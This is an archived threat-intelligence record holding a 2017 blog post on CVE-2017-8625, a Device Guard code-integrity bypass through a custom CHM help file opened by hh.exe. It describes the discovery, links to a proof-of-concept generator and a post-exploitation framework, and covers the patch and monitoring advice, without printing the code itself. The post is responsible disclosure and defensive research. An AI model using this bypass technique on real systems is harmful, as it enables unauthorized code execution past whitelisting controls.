{
	"id": "c17cd9b8-b9cb-4a9c-af76-272d7bd80bc6",
	"created_at": "2026-04-06T03:37:07.907662Z",
	"updated_at": "2026-04-10T03:22:06.632557Z",
	"deleted_at": null,
	"sha1_hash": "83dbe7465075428f482c9586feb4359b29900e87",
	"title": "Bypassing Device guard UMCI using CHM – CVE-2017-8625",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 161700,
	"plain_text": "Bypassing Device guard UMCI using CHM – CVE-2017-8625\r\nPublished: 2017-08-13 · Archived: 2026-04-06 02:59:50 UTC\r\nTL;DR\r\nYou could/can bypass Device Guard user mode code integrity with a custom CHM and execute code.\r\nThe last 6 months I have done some security research on my (little) spare time, because I find that very interesting. During\r\nthis time, I was lucky enough to find another valid Device Guard UMCI bypass (I found the bginfo.exe as well:\r\nhttps://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/) and reported this to the Microsoft Security\r\nResponse Center (secure@microsoft.com).\r\nAfter a dialog with MSRC they told me that this was already discovered by another security researcher and that this would\r\nbecome a CVE with my name on it as well. (This was big news to me )\r\nMSRC could not tell who the other researcher was, but Matt Graeber knew (Love that guy) . The other researcher was Matt\r\nNelson and he had found this bypass a while back. Awesome!\r\nAnyways this blogpost looks into how I made the discovery and some PoC code as well.\r\nI am not a hardcore reverse engineer (yet ), so I will not do a full disassembly tour of the fix Microsoft has done, but rather\r\nfocusing on how I found this.\r\nFor me this discovery started as I was looking through binary files in the windows and the system32 folder. I do this from\r\ntime to time to discover new stuff.\r\nI stumbled upon a binary file called hh.exe.\r\nI went on and ran “hh.exe /?”. Assuming I either would get some help on the command or an error. Well, that is not what\r\nhappened.\r\nI got this instead:\r\nThis triggered my curiosity to the max. This trick btw still works on the latest Windows 10 and I guess if you ever need to\r\nhave an explorer in a locked down environment (Terminal server etc) this could do it. You could also run for instance\r\n“hh.exe c:”.\r\nAfter trying a lot of different stuff, I realized you could also browse the internet through hh.exe. Just by typing “hh.exe\r\nhttp://www.google.com\u0026#8221; proves this. (Still works in the latest Windows 10)\r\nhttps://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/\r\nPage 1 of 4\n\nIt looks like this:\r\nThe first thing that struck my mind was to check the integrity level of the hh.exe process and guess what….\r\nYeah, my “browser” inside hh.exe is running in medium integrity mode and a normal iexplore process runs in Low. This\r\nshould make it easier to exploit the browser inside hh.exe. (There is more research to be done here)\r\nAfter trying a lot of different approaches, I thought I would try to create a custom help file with code inside, since HH.exe is\r\nprimarily used for displaying help files.\r\nI searched the web for any valid sources of these kinds of projects and stumbled upon this:\r\nhttps://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1\r\n(thanks to Nikhil “SamratAshok” Mittal)\r\nTo run this script, I had to download and install the “HTML Help Workshop and Documentation” first:\r\nhttp://www.microsoft.com/en-us/download/details.aspx?id=21138\r\nI ended up creating my own version of Nikhil’s script, since I only wanted to prove my PoC and pop a Calculator.\r\nMy PoC script can be found here:\r\nhttps://gist.githubusercontent.com/api0cradle/95ae3c7120f16255d94088bd8959f4b2/raw/fa25b85e85bbb64c5cf021adf92b125357086a6f/Genera\r\nThis script generates a simple .CHM that starts Calc.exe through ActiveX. There are certainly far more interesting things\r\nyou can do.\r\nFor instance, running Cn33liz StarFighters to get an Empire agent going: https://github.com/Cn33liz/StarFighters/\r\nThe interesting part of my PoC script are these lines:\r\nThis gif shows you the Device Guard bypass in action:\r\nhttps://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/\r\nPage 2 of 4\n\nThis issue is fixed in the Windows 10 Creators update v1703 (aka Redstone 2) or if you want to patch it on older versions of\r\nWindows 10 you can find the correct patch here: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625\r\nAfter I updated my machine to v1703 of Windows 10 I got this error when I tried to run the custom CHM file:\r\nFor you defenders out there, I would also monitor hh.exe and look at what the process is doing on your machines. Could be\r\nevil stuff going on.\r\nThat’s it. Hope this was interesting to read and that it inspired you to conduct your own security research to make Windows\r\neven more secure. If you are interested in learning more about Device Guard I suggest reading Microsoft official\r\ndocumentation and some blogposts by Matt Graeber (they have helped me):\r\nhttps://docs.microsoft.com/en-us/windows/device-security/device-guard/device-guard-deployment-guide\r\nhttp://www.exploit-monday.com/2016/09/introduction-to-windows-device-guard.html\r\nhttp://www.exploit-monday.com/2016/09/using-device-guard-to-mitigate-against.html\r\nhttp://www.exploit-monday.com/2016/10/code-integrity-policy-reference.html\r\nhttps://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/\r\nPage 3 of 4\n\nhttp://www.exploit-monday.com/2016/11/code-integrity-policy-audit-methodology.html\r\nhttp://www.exploit-monday.com/2016/11/Effectiveness-of-Device-Guard-UMCI.html\r\nhttp://www.exploit-monday.com/2016/12/updating-device-guard-code-integrity.html\r\nRemember to send your discoveries to secure@microsoft.com and do not use your discoveries for evil. #WhiteHat4Life\r\nSource: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/\r\nhttps://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/"
	],
	"report_names": [
		"bypassing-device-guard-umci-using-chm-cve-2017-8625"
	],
	"threat_actors": [],
	"ts_created_at": 1775446627,
	"ts_updated_at": 1775791326,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/83dbe7465075428f482c9586feb4359b29900e87.pdf",
		"text": "https://archive.orkl.eu/83dbe7465075428f482c9586feb4359b29900e87.txt",
		"img": "https://archive.orkl.eu/83dbe7465075428f482c9586feb4359b29900e87.jpg"
	}
}